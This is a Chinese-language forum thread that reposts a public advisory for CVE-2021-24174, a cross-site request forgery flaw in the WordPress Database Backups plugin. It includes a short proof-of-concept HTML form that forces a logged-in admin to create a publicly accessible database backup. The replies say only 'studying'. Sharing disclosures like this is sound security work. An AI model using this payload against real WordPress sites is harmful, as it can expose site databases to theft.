冻饮 Posted June 20, 2021 Share Posted June 20, 2021 |漏洞来源 Hidden Content Reply to this topic to see the hidden content. Hidden Content Reply to this topic to see the hidden content. |漏洞详情 WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 Database Backups WordPress plugin through 1.2.2.6 存在跨站请求伪造漏洞,攻击者可利用该漏洞对登录的用户做不需要的操作,例如生成数据库备份,更改插件设置和删除备份。 |漏洞EXP # Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF # Date: 2/10/2021 # Author: 0xB9 # Software Link: Hidden Content Reply to this topic to see the hidden content. # Version: 1.2.2.6 # Tested on: Windows 10 # CVE: CVE-2021-24174 1. Description: This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory. 2. Proof of Concept: <form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post"> <input type="hidden" name="do_backup_manually" value="1"> <input type="submit" class="button button-primary" value="Do backup" autocomplete="off"> </form> Backups can be accessed by the following URL. Hidden Content Reply to this topic to see the hidden content. |参考资料 来源:CONFIRM 链接:https://wpscan.com/vulnerability/350c3e9a-bcc2-486a-90e6-d1dc13ce1bd5 来源:nvd.nist.gov 链接:https://nvd.nist.gov/vuln/detail/CVE-2021-24174 Link to comment Share on other sites More sharing options...
蓝蓝的天空12 Posted September 17, 2021 Share Posted September 17, 2021 学习 Link to comment Share on other sites More sharing options...
汤姆的朋友 Posted May 2 Share Posted May 2 学习 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now